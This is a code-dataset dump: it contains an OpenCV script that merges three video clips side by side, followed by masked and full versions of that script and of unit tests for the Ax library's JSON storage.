if not reader.isOpened():
return None, None, None
width = int(reader.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(reader.get(cv2.CAP_PROP_FRAME_HEIGHT))
frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))
return width, height, frame_count
w1, h1, fc1 = get_meta(INPUT_1)
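# the phone clip is transposed below (a 90-degree rotation), so its stored width becomes the display height - hence the swapped unpack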
h2, w2, fc2 = get_meta(INPUT_2)
ratio = h1 / h2
w2 = int(w2*ratio)+1
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
writer = cv2.VideoWriter(os.path.join(DIR, 'output.avi'), fourcc, 29.97, (w1+w2+10, h1))
border = np.zeros((h1, 10, 3), dtype='uint8')
filler = np.zeros((h1, w2, 3), dtype='uint8')
reader1 = cv2.VideoCapture(INPUT_1)
reader2 = cv2.VideoCapture(INPUT_2)
reader3 = cv2.VideoCapture(INPUT_3)
last_shape = (h1, w1+w2+10, 3)
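# Phase 1: the right video plays from frame 0; the left side stays black until clip 1's sync offset, then clip 1 plays in full (rotated and scaled)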
for fid in tqdm(range(fc2+RIGHT_SYNC_1-LEFT_SYNC_1)):
_, right_frame = reader1.read()
if fid < RIGHT_SYNC_1-LEFT_SYNC_1:
left_frame = filler
else:
_, left_frame = reader2.read()
left_frame = cv2.transpose(left_frame)
left_frame = cv2.resize(left_frame, None, fx=ratio, fy=ratio)
left_frame = cv2.flip(left_frame, 1)
new_frame = np.concatenate([left_frame, border, right_frame], axis=1)
# cv2.imshow('out', new_frame)
writer.write(new_frame)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
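# Phase 2: clip 1 has ended and clip 2 has not started yet - keep the left side black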
for fid in tqdm(range(fc2+RIGHT_SYNC_1-LEFT_SYNC_1, RIGHT_SYNC_2-LEFT_SYNC_2)):
_, right_frame = reader1.read()
new_frame = np.concatenate([filler, border, right_frame], axis=1)
# cv2.imshow('out', new_frame)
writer.write(new_frame)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
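# Phase 3: play clip 2 (INPUT_3) on the left for the remainder of the right video, falling back to black if it ends first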
for fid in tqdm(range(RIGHT_SYNC_2-LEFT_SYNC_2, fc1)):
r1, right_frame = reader1.read()
if not r1:
break
r3, left_frame = reader3.read()
if not r3:
left_frame = filler
else:
left_frame = cv2.transpose(left_frame)
left_frame = cv2.resize(left_frame, None, fx=ratio, fy=ratio)
left_frame = cv2.flip(left_frame, 1)
new_frame = np.concatenate([left_frame, border, right_frame], axis=1)
# cv2.imshow('out', new_frame)
writer.write(new_frame)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
reader1.release()
reader2.release()
reader3.release()
writer.release()
cv2.destroyAllWindows()
|
normal
|
{
"blob_id": "f8f538773693b9d9530775094d9948626247a3bb",
"index": 6950,
"step-1": "<mask token>\n\n\ndef add_frame_id(video, output_dir):\n reader = cv2.VideoCapture(video)\n if not reader.isOpened():\n return -1\n os.makedirs(output_dir, exist_ok=True)\n frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))\n for frame_id in tqdm(range(frame_count)):\n has_frame, frame = reader.read()\n if not has_frame:\n break\n cv2.imwrite(os.path.join(output_dir, f'{frame_id}.jpg'), frame)\n reader.release()\n return 0\n\n\ndef get_meta(video):\n reader = cv2.VideoCapture(video)\n if not reader.isOpened():\n return None, None, None\n width = int(reader.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(reader.get(cv2.CAP_PROP_FRAME_HEIGHT))\n frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))\n return width, height, frame_count\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef add_frame_id(video, output_dir):\n reader = cv2.VideoCapture(video)\n if not reader.isOpened():\n return -1\n os.makedirs(output_dir, exist_ok=True)\n frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))\n for frame_id in tqdm(range(frame_count)):\n has_frame, frame = reader.read()\n if not has_frame:\n break\n cv2.imwrite(os.path.join(output_dir, f'{frame_id}.jpg'), frame)\n reader.release()\n return 0\n\n\ndef get_meta(video):\n reader = cv2.VideoCapture(video)\n if not reader.isOpened():\n return None, None, None\n width = int(reader.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(reader.get(cv2.CAP_PROP_FRAME_HEIGHT))\n frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))\n return width, height, frame_count\n\n\n<mask token>\nfor fid in tqdm(range(fc2 + RIGHT_SYNC_1 - LEFT_SYNC_1)):\n _, right_frame = reader1.read()\n if fid < RIGHT_SYNC_1 - LEFT_SYNC_1:\n left_frame = filler\n else:\n _, left_frame = reader2.read()\n left_frame = cv2.transpose(left_frame)\n left_frame = cv2.resize(left_frame, None, fx=ratio, fy=ratio)\n left_frame = cv2.flip(left_frame, 1)\n new_frame = np.concatenate([left_frame, border, right_frame], axis=1)\n writer.write(new_frame)\nfor fid in tqdm(range(fc2 + RIGHT_SYNC_1 - LEFT_SYNC_1, RIGHT_SYNC_2 -\n LEFT_SYNC_2)):\n _, right_frame = reader1.read()\n new_frame = np.concatenate([filler, border, right_frame], axis=1)\n writer.write(new_frame)\nfor fid in tqdm(range(RIGHT_SYNC_2 - LEFT_SYNC_2, fc1)):\n r1, right_frame = reader1.read()\n if not r1:\n break\n r3, left_frame = reader3.read()\n if not r3:\n left_frame = filler\n else:\n left_frame = cv2.transpose(left_frame)\n left_frame = cv2.resize(left_frame, None, fx=ratio, fy=ratio)\n left_frame = cv2.flip(left_frame, 1)\n new_frame = np.concatenate([left_frame, border, right_frame], axis=1)\n writer.write(new_frame)\nreader1.release()\nreader2.release()\nwriter.release()\ncv2.destroyAllWindows()\n",
"step-3": "<mask token>\nDIR = '/home/nghiatruong/Desktop'\nINPUT_1 = os.path.join(DIR, 'GOPR1806.MP4')\nINPUT_2 = os.path.join(DIR, '20190715_180940.mp4')\nINPUT_3 = os.path.join(DIR, '20190715_181200.mp4')\nRIGHT_SYNC_1 = 1965\nLEFT_SYNC_1 = 1700\nRIGHT_SYNC_2 = 5765\nLEFT_SYNC_2 = 1282\n\n\ndef add_frame_id(video, output_dir):\n reader = cv2.VideoCapture(video)\n if not reader.isOpened():\n return -1\n os.makedirs(output_dir, exist_ok=True)\n frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))\n for frame_id in tqdm(range(frame_count)):\n has_frame, frame = reader.read()\n if not has_frame:\n break\n cv2.imwrite(os.path.join(output_dir, f'{frame_id}.jpg'), frame)\n reader.release()\n return 0\n\n\ndef get_meta(video):\n reader = cv2.VideoCapture(video)\n if not reader.isOpened():\n return None, None, None\n width = int(reader.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(reader.get(cv2.CAP_PROP_FRAME_HEIGHT))\n frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))\n return width, height, frame_count\n\n\nw1, h1, fc1 = get_meta(INPUT_1)\nh2, w2, fc2 = get_meta(INPUT_2)\nratio = h1 / h2\nw2 = int(w2 * ratio) + 1\nfourcc = cv2.VideoWriter_fourcc(*'MJPG')\nwriter = cv2.VideoWriter(os.path.join(DIR, 'output.avi'), fourcc, 29.97, (\n w1 + w2 + 10, h1))\nborder = np.zeros((h1, 10, 3), dtype='uint8')\nfiller = np.zeros((h1, w2, 3), dtype='uint8')\nreader1 = cv2.VideoCapture(INPUT_1)\nreader2 = cv2.VideoCapture(INPUT_2)\nreader3 = cv2.VideoCapture(INPUT_3)\nlast_shape = h1, w1 + w2 + 10, 3\nfor fid in tqdm(range(fc2 + RIGHT_SYNC_1 - LEFT_SYNC_1)):\n _, right_frame = reader1.read()\n if fid < RIGHT_SYNC_1 - LEFT_SYNC_1:\n left_frame = filler\n else:\n _, left_frame = reader2.read()\n left_frame = cv2.transpose(left_frame)\n left_frame = cv2.resize(left_frame, None, fx=ratio, fy=ratio)\n left_frame = cv2.flip(left_frame, 1)\n new_frame = np.concatenate([left_frame, border, right_frame], axis=1)\n writer.write(new_frame)\nfor fid in tqdm(range(fc2 + RIGHT_SYNC_1 - LEFT_SYNC_1, RIGHT_SYNC_2 -\n LEFT_SYNC_2)):\n _, right_frame = reader1.read()\n new_frame = np.concatenate([filler, border, right_frame], axis=1)\n writer.write(new_frame)\nfor fid in tqdm(range(RIGHT_SYNC_2 - LEFT_SYNC_2, fc1)):\n r1, right_frame = reader1.read()\n if not r1:\n break\n r3, left_frame = reader3.read()\n if not r3:\n left_frame = filler\n else:\n left_frame = cv2.transpose(left_frame)\n left_frame = cv2.resize(left_frame, None, fx=ratio, fy=ratio)\n left_frame = cv2.flip(left_frame, 1)\n new_frame = np.concatenate([left_frame, border, right_frame], axis=1)\n writer.write(new_frame)\nreader1.release()\nreader2.release()\nwriter.release()\ncv2.destroyAllWindows()\n",
"step-4": "import cv2\nimport numpy as np\nimport os\nfrom tqdm import tqdm\nDIR = '/home/nghiatruong/Desktop'\nINPUT_1 = os.path.join(DIR, 'GOPR1806.MP4')\nINPUT_2 = os.path.join(DIR, '20190715_180940.mp4')\nINPUT_3 = os.path.join(DIR, '20190715_181200.mp4')\nRIGHT_SYNC_1 = 1965\nLEFT_SYNC_1 = 1700\nRIGHT_SYNC_2 = 5765\nLEFT_SYNC_2 = 1282\n\n\ndef add_frame_id(video, output_dir):\n reader = cv2.VideoCapture(video)\n if not reader.isOpened():\n return -1\n os.makedirs(output_dir, exist_ok=True)\n frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))\n for frame_id in tqdm(range(frame_count)):\n has_frame, frame = reader.read()\n if not has_frame:\n break\n cv2.imwrite(os.path.join(output_dir, f'{frame_id}.jpg'), frame)\n reader.release()\n return 0\n\n\ndef get_meta(video):\n reader = cv2.VideoCapture(video)\n if not reader.isOpened():\n return None, None, None\n width = int(reader.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(reader.get(cv2.CAP_PROP_FRAME_HEIGHT))\n frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))\n return width, height, frame_count\n\n\nw1, h1, fc1 = get_meta(INPUT_1)\nh2, w2, fc2 = get_meta(INPUT_2)\nratio = h1 / h2\nw2 = int(w2 * ratio) + 1\nfourcc = cv2.VideoWriter_fourcc(*'MJPG')\nwriter = cv2.VideoWriter(os.path.join(DIR, 'output.avi'), fourcc, 29.97, (\n w1 + w2 + 10, h1))\nborder = np.zeros((h1, 10, 3), dtype='uint8')\nfiller = np.zeros((h1, w2, 3), dtype='uint8')\nreader1 = cv2.VideoCapture(INPUT_1)\nreader2 = cv2.VideoCapture(INPUT_2)\nreader3 = cv2.VideoCapture(INPUT_3)\nlast_shape = h1, w1 + w2 + 10, 3\nfor fid in tqdm(range(fc2 + RIGHT_SYNC_1 - LEFT_SYNC_1)):\n _, right_frame = reader1.read()\n if fid < RIGHT_SYNC_1 - LEFT_SYNC_1:\n left_frame = filler\n else:\n _, left_frame = reader2.read()\n left_frame = cv2.transpose(left_frame)\n left_frame = cv2.resize(left_frame, None, fx=ratio, fy=ratio)\n left_frame = cv2.flip(left_frame, 1)\n new_frame = np.concatenate([left_frame, border, right_frame], axis=1)\n writer.write(new_frame)\nfor fid in tqdm(range(fc2 + RIGHT_SYNC_1 - LEFT_SYNC_1, RIGHT_SYNC_2 -\n LEFT_SYNC_2)):\n _, right_frame = reader1.read()\n new_frame = np.concatenate([filler, border, right_frame], axis=1)\n writer.write(new_frame)\nfor fid in tqdm(range(RIGHT_SYNC_2 - LEFT_SYNC_2, fc1)):\n r1, right_frame = reader1.read()\n if not r1:\n break\n r3, left_frame = reader3.read()\n if not r3:\n left_frame = filler\n else:\n left_frame = cv2.transpose(left_frame)\n left_frame = cv2.resize(left_frame, None, fx=ratio, fy=ratio)\n left_frame = cv2.flip(left_frame, 1)\n new_frame = np.concatenate([left_frame, border, right_frame], axis=1)\n writer.write(new_frame)\nreader1.release()\nreader2.release()\nwriter.release()\ncv2.destroyAllWindows()\n",
"step-5": "import cv2\nimport numpy as np\nimport os\nfrom tqdm import tqdm\n\n\nDIR = '/home/nghiatruong/Desktop'\nINPUT_1 = os.path.join(DIR, 'GOPR1806.MP4')\nINPUT_2 = os.path.join(DIR, '20190715_180940.mp4')\nINPUT_3 = os.path.join(DIR, '20190715_181200.mp4')\nRIGHT_SYNC_1 = 1965\nLEFT_SYNC_1 = 1700\nRIGHT_SYNC_2 = 5765\nLEFT_SYNC_2 = 1282\n\n\ndef add_frame_id(video, output_dir):\n reader = cv2.VideoCapture(video)\n if not reader.isOpened():\n return -1\n os.makedirs(output_dir, exist_ok=True)\n frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))\n\n for frame_id in tqdm(range(frame_count)):\n has_frame, frame = reader.read()\n if not has_frame:\n break\n cv2.imwrite(os.path.join(output_dir, f'{frame_id}.jpg'), frame)\n\n reader.release()\n return 0\n\n\ndef get_meta(video):\n reader = cv2.VideoCapture(video)\n if not reader.isOpened():\n return None, None, None\n width = int(reader.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(reader.get(cv2.CAP_PROP_FRAME_HEIGHT))\n frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))\n return width, height, frame_count\n\n\nw1, h1, fc1 = get_meta(INPUT_1)\nh2, w2, fc2 = get_meta(INPUT_2)\nratio = h1 / h2\nw2 = int(w2*ratio)+1\nfourcc = cv2.VideoWriter_fourcc(*'MJPG')\nwriter = cv2.VideoWriter(os.path.join(DIR, 'output.avi'), fourcc, 29.97, (w1+w2+10, h1))\nborder = np.zeros((h1, 10, 3), dtype='uint8')\nfiller = np.zeros((h1, w2, 3), dtype='uint8')\n\nreader1 = cv2.VideoCapture(INPUT_1)\nreader2 = cv2.VideoCapture(INPUT_2)\nreader3 = cv2.VideoCapture(INPUT_3)\n\nlast_shape = (h1, w1+w2+10, 3)\nfor fid in tqdm(range(fc2+RIGHT_SYNC_1-LEFT_SYNC_1)):\n _, right_frame = reader1.read()\n if fid < RIGHT_SYNC_1-LEFT_SYNC_1:\n left_frame = filler\n else:\n _, left_frame = reader2.read()\n left_frame = cv2.transpose(left_frame)\n left_frame = cv2.resize(left_frame, None, fx=ratio, fy=ratio)\n left_frame = cv2.flip(left_frame, 1)\n new_frame = np.concatenate([left_frame, border, right_frame], axis=1)\n # cv2.imshow('out', new_frame)\n writer.write(new_frame)\n # if cv2.waitKey(1) & 0xFF == ord('q'):\n # break\n\nfor fid in tqdm(range(fc2+RIGHT_SYNC_1-LEFT_SYNC_1, RIGHT_SYNC_2-LEFT_SYNC_2)):\n _, right_frame = reader1.read()\n new_frame = np.concatenate([filler, border, right_frame], axis=1)\n # cv2.imshow('out', new_frame)\n writer.write(new_frame)\n # if cv2.waitKey(1) & 0xFF == ord('q'):\n # break\n\nfor fid in tqdm(range(RIGHT_SYNC_2-LEFT_SYNC_2, fc1)):\n r1, right_frame = reader1.read()\n if not r1:\n break\n r3, left_frame = reader3.read()\n if not r3:\n left_frame = filler\n else:\n left_frame = cv2.transpose(left_frame)\n left_frame = cv2.resize(left_frame, None, fx=ratio, fy=ratio)\n left_frame = cv2.flip(left_frame, 1)\n new_frame = np.concatenate([left_frame, border, right_frame], axis=1)\n # cv2.imshow('out', new_frame)\n writer.write(new_frame)\n # if cv2.waitKey(1) & 0xFF == ord('q'):\n # break\n\n\nreader1.release()\nreader2.release()\nwriter.release()\ncv2.destroyAllWindows()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class JSONStoreTest(TestCase):
def setUp(self):
self.experiment = get_experiment_with_batch_and_single_trial()
def testJSONEncodeFailure(self):
self.assertRaises(JSONEncodeError, object_to_json, RuntimeError(
'foobar'))
def testJSONDecodeFailure(self):
self.assertRaises(JSONDecodeError, object_from_json, RuntimeError(
'foobar'))
self.assertRaises(JSONDecodeError, object_from_json, {'__type':
'foobar'})
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def testValidateFilename(self):
bad_filename = 'test'
self.assertRaises(ValueError, save_experiment, self.experiment,
bad_filename)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def testEncodeDecodeNumpy(self):
arr = np.array([[1, 2, 3], [4, 5, 6]])
self.assertTrue(np.array_equal(arr, object_from_json(object_to_json
(arr))))
def testEncodeDecodeSimpleBenchmarkProblem(self):
branin_problem = get_branin_simple_benchmark_problem()
sum_problem = get_sum_simple_benchmark_problem()
new_branin_problem = object_from_json(object_to_json(branin_problem))
new_sum_problem = object_from_json(object_to_json(sum_problem))
self.assertEqual(branin_problem.f(1, 2), new_branin_problem.f(1, 2),
branin(1, 2))
self.assertEqual(sum_problem.f([1, 2]), new_sum_problem.f([1, 2]), 3)
ackley_problem = SimpleBenchmarkProblem(f=from_botorch(Ackley()),
noise_sd=0.0, minimize=True)
new_ackley_problem = object_from_json(object_to_json(ackley_problem))
self.assertEqual(ackley_problem.f(1, 2), new_ackley_problem.f(1, 2),
ackley(1, 2))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class JSONStoreTest(TestCase):
def setUp(self):
self.experiment = get_experiment_with_batch_and_single_trial()
def testJSONEncodeFailure(self):
self.assertRaises(JSONEncodeError, object_to_json, RuntimeError(
'foobar'))
def testJSONDecodeFailure(self):
self.assertRaises(JSONDecodeError, object_from_json, RuntimeError(
'foobar'))
self.assertRaises(JSONDecodeError, object_from_json, {'__type':
'foobar'})
def testSaveAndLoad(self):
with tempfile.NamedTemporaryFile(mode='w+', delete=False, suffix=
'.json') as f:
save_experiment(self.experiment, f.name)
loaded_experiment = load_experiment(f.name)
self.assertEqual(loaded_experiment, self.experiment)
os.remove(f.name)
<|reserved_special_token_0|>
def testValidateFilename(self):
bad_filename = 'test'
self.assertRaises(ValueError, save_experiment, self.experiment,
bad_filename)
<|reserved_special_token_0|>
def testEncodeDecodeTorchTensor(self):
x = torch.tensor([[1.0, 2.0], [3.0, 4.0]], dtype=torch.float64,
device=torch.device('cpu'))
expected_json = {'__type': 'Tensor', 'value': [[1.0, 2.0], [3.0,
4.0]], 'dtype': {'__type': 'torch_dtype', 'value':
'torch.float64'}, 'device': {'__type': 'torch_device', 'value':
'cpu'}}
x_json = object_to_json(x)
self.assertEqual(expected_json, x_json)
x2 = object_from_json(x_json)
self.assertTrue(torch.equal(x, x2))
def testDecodeGenerationStrategy(self):
generation_strategy = get_generation_strategy()
experiment = get_branin_experiment()
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertGreater(len(new_generation_strategy._steps), 0)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
self.assertIsNone(new_generation_strategy.model)
generation_strategy = get_generation_strategy(with_callable_model_kwarg
=False)
gr = generation_strategy.gen(experiment)
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
self.assertIsInstance(new_generation_strategy.model, ModelBridge)
generation_strategy = new_generation_strategy
experiment.new_trial(gr)
generation_strategy.gen(experiment, data=get_branin_data())
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
self.assertIsInstance(new_generation_strategy.model, ModelBridge)
def testEncodeDecodeNumpy(self):
arr = np.array([[1, 2, 3], [4, 5, 6]])
self.assertTrue(np.array_equal(arr, object_from_json(object_to_json
(arr))))
def testEncodeDecodeSimpleBenchmarkProblem(self):
branin_problem = get_branin_simple_benchmark_problem()
sum_problem = get_sum_simple_benchmark_problem()
new_branin_problem = object_from_json(object_to_json(branin_problem))
new_sum_problem = object_from_json(object_to_json(sum_problem))
self.assertEqual(branin_problem.f(1, 2), new_branin_problem.f(1, 2),
branin(1, 2))
self.assertEqual(sum_problem.f([1, 2]), new_sum_problem.f([1, 2]), 3)
ackley_problem = SimpleBenchmarkProblem(f=from_botorch(Ackley()),
noise_sd=0.0, minimize=True)
new_ackley_problem = object_from_json(object_to_json(ackley_problem))
self.assertEqual(ackley_problem.f(1, 2), new_ackley_problem.f(1, 2),
ackley(1, 2))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class JSONStoreTest(TestCase):
def setUp(self):
self.experiment = get_experiment_with_batch_and_single_trial()
def testJSONEncodeFailure(self):
self.assertRaises(JSONEncodeError, object_to_json, RuntimeError(
'foobar'))
def testJSONDecodeFailure(self):
self.assertRaises(JSONDecodeError, object_from_json, RuntimeError(
'foobar'))
self.assertRaises(JSONDecodeError, object_from_json, {'__type':
'foobar'})
def testSaveAndLoad(self):
with tempfile.NamedTemporaryFile(mode='w+', delete=False, suffix=
'.json') as f:
save_experiment(self.experiment, f.name)
loaded_experiment = load_experiment(f.name)
self.assertEqual(loaded_experiment, self.experiment)
os.remove(f.name)
def testSaveValidation(self):
with self.assertRaises(ValueError):
save_experiment(self.experiment.trials[0], 'test.json')
def testValidateFilename(self):
bad_filename = 'test'
self.assertRaises(ValueError, save_experiment, self.experiment,
bad_filename)
<|reserved_special_token_0|>
def testEncodeDecodeTorchTensor(self):
x = torch.tensor([[1.0, 2.0], [3.0, 4.0]], dtype=torch.float64,
device=torch.device('cpu'))
expected_json = {'__type': 'Tensor', 'value': [[1.0, 2.0], [3.0,
4.0]], 'dtype': {'__type': 'torch_dtype', 'value':
'torch.float64'}, 'device': {'__type': 'torch_device', 'value':
'cpu'}}
x_json = object_to_json(x)
self.assertEqual(expected_json, x_json)
x2 = object_from_json(x_json)
self.assertTrue(torch.equal(x, x2))
def testDecodeGenerationStrategy(self):
generation_strategy = get_generation_strategy()
experiment = get_branin_experiment()
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertGreater(len(new_generation_strategy._steps), 0)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
self.assertIsNone(new_generation_strategy.model)
generation_strategy = get_generation_strategy(with_callable_model_kwarg
=False)
gr = generation_strategy.gen(experiment)
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
self.assertIsInstance(new_generation_strategy.model, ModelBridge)
generation_strategy = new_generation_strategy
experiment.new_trial(gr)
generation_strategy.gen(experiment, data=get_branin_data())
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
self.assertIsInstance(new_generation_strategy.model, ModelBridge)
def testEncodeDecodeNumpy(self):
arr = np.array([[1, 2, 3], [4, 5, 6]])
self.assertTrue(np.array_equal(arr, object_from_json(object_to_json
(arr))))
def testEncodeDecodeSimpleBenchmarkProblem(self):
branin_problem = get_branin_simple_benchmark_problem()
sum_problem = get_sum_simple_benchmark_problem()
new_branin_problem = object_from_json(object_to_json(branin_problem))
new_sum_problem = object_from_json(object_to_json(sum_problem))
self.assertEqual(branin_problem.f(1, 2), new_branin_problem.f(1, 2),
branin(1, 2))
self.assertEqual(sum_problem.f([1, 2]), new_sum_problem.f([1, 2]), 3)
ackley_problem = SimpleBenchmarkProblem(f=from_botorch(Ackley()),
noise_sd=0.0, minimize=True)
new_ackley_problem = object_from_json(object_to_json(ackley_problem))
self.assertEqual(ackley_problem.f(1, 2), new_ackley_problem.f(1, 2),
ackley(1, 2))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def testDecodeUnknownClassFromJson(self):
with self.assertRaisesRegex(ValueError,
'does not have a corresponding entry in CLASS_TO_REVERSE_REGISTRY'
):
class_from_json({'index': 0, 'class': 'unknown_path'})
|
<mask token>
class JSONStoreTest(TestCase):
def setUp(self):
self.experiment = get_experiment_with_batch_and_single_trial()
def testJSONEncodeFailure(self):
self.assertRaises(JSONEncodeError, object_to_json, RuntimeError(
'foobar'))
def testJSONDecodeFailure(self):
self.assertRaises(JSONDecodeError, object_from_json, RuntimeError(
'foobar'))
self.assertRaises(JSONDecodeError, object_from_json, {'__type':
'foobar'})
def testSaveAndLoad(self):
with tempfile.NamedTemporaryFile(mode='w+', delete=False, suffix=
'.json') as f:
save_experiment(self.experiment, f.name)
loaded_experiment = load_experiment(f.name)
self.assertEqual(loaded_experiment, self.experiment)
os.remove(f.name)
def testSaveValidation(self):
with self.assertRaises(ValueError):
save_experiment(self.experiment.trials[0], 'test.json')
def testValidateFilename(self):
bad_filename = 'test'
self.assertRaises(ValueError, save_experiment, self.experiment,
bad_filename)
<mask token>
def testEncodeDecodeTorchTensor(self):
x = torch.tensor([[1.0, 2.0], [3.0, 4.0]], dtype=torch.float64,
device=torch.device('cpu'))
expected_json = {'__type': 'Tensor', 'value': [[1.0, 2.0], [3.0,
4.0]], 'dtype': {'__type': 'torch_dtype', 'value':
'torch.float64'}, 'device': {'__type': 'torch_device', 'value':
'cpu'}}
x_json = object_to_json(x)
self.assertEqual(expected_json, x_json)
x2 = object_from_json(x_json)
self.assertTrue(torch.equal(x, x2))
def testDecodeGenerationStrategy(self):
generation_strategy = get_generation_strategy()
experiment = get_branin_experiment()
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertGreater(len(new_generation_strategy._steps), 0)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
self.assertIsNone(new_generation_strategy.model)
generation_strategy = get_generation_strategy(with_callable_model_kwarg
=False)
gr = generation_strategy.gen(experiment)
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
self.assertIsInstance(new_generation_strategy.model, ModelBridge)
generation_strategy = new_generation_strategy
experiment.new_trial(gr)
generation_strategy.gen(experiment, data=get_branin_data())
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
self.assertIsInstance(new_generation_strategy.model, ModelBridge)
def testEncodeDecodeNumpy(self):
arr = np.array([[1, 2, 3], [4, 5, 6]])
self.assertTrue(np.array_equal(arr, object_from_json(object_to_json
(arr))))
def testEncodeDecodeSimpleBenchmarkProblem(self):
branin_problem = get_branin_simple_benchmark_problem()
sum_problem = get_sum_simple_benchmark_problem()
new_branin_problem = object_from_json(object_to_json(branin_problem))
new_sum_problem = object_from_json(object_to_json(sum_problem))
self.assertEqual(branin_problem.f(1, 2), new_branin_problem.f(1, 2),
branin(1, 2))
self.assertEqual(sum_problem.f([1, 2]), new_sum_problem.f([1, 2]), 3)
ackley_problem = SimpleBenchmarkProblem(f=from_botorch(Ackley()),
noise_sd=0.0, minimize=True)
new_ackley_problem = object_from_json(object_to_json(ackley_problem))
self.assertEqual(ackley_problem.f(1, 2), new_ackley_problem.f(1, 2),
ackley(1, 2))
def testRegistryAdditions(self):
class MyRunner(Runner):
def run():
pass
def staging_required():
return False
class MyMetric(Metric):
pass
register_metric(MyMetric)
register_runner(MyRunner)
experiment = get_experiment_with_batch_and_single_trial()
experiment.runner = MyRunner()
experiment.add_tracking_metric(MyMetric(name='my_metric'))
with tempfile.NamedTemporaryFile(mode='w+', delete=False, suffix=
'.json') as f:
save_experiment(experiment, f.name)
loaded_experiment = load_experiment(f.name)
self.assertEqual(loaded_experiment, experiment)
os.remove(f.name)
def testEncodeUnknownClassToDict(self):
class UnknownClass:
def __init__(self):
pass
with self.assertRaisesRegex(ValueError,
'is a class. Add it to the CLASS_ENCODER_REGISTRY'):
object_to_json(UnknownClass)
CLASS_ENCODER_REGISTRY[UnknownClass] = botorch_modular_to_dict
with self.assertRaisesRegex(ValueError,
'does not have a corresponding parent class in CLASS_TO_REGISTRY'):
object_to_json(UnknownClass)
def testDecodeUnknownClassFromJson(self):
with self.assertRaisesRegex(ValueError,
'does not have a corresponding entry in CLASS_TO_REVERSE_REGISTRY'
):
class_from_json({'index': 0, 'class': 'unknown_path'})
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import tempfile
from functools import partial
import numpy as np
import torch
from ax.benchmark.benchmark_problem import SimpleBenchmarkProblem
from ax.core.metric import Metric
from ax.core.runner import Runner
from ax.exceptions.storage import JSONDecodeError, JSONEncodeError
from ax.modelbridge.base import ModelBridge
from ax.modelbridge.registry import Models
from ax.storage.json_store.decoder import (
generation_strategy_from_json,
object_from_json,
)
from ax.storage.json_store.decoders import class_from_json
from ax.storage.json_store.encoder import object_to_json
from ax.storage.json_store.encoders import botorch_modular_to_dict
from ax.storage.json_store.load import load_experiment
from ax.storage.json_store.registry import CLASS_ENCODER_REGISTRY
from ax.storage.json_store.save import save_experiment
from ax.storage.metric_registry import register_metric
from ax.storage.runner_registry import register_runner
from ax.utils.common.testutils import TestCase
from ax.utils.measurement.synthetic_functions import ackley, branin, from_botorch
from ax.utils.testing.benchmark_stubs import (
get_branin_benchmark_problem,
get_branin_simple_benchmark_problem,
get_mult_simple_benchmark_problem,
get_sum_simple_benchmark_problem,
)
from ax.utils.testing.core_stubs import (
get_abandoned_arm,
get_acquisition_function_type,
get_acquisition_type,
get_arm,
get_augmented_branin_metric,
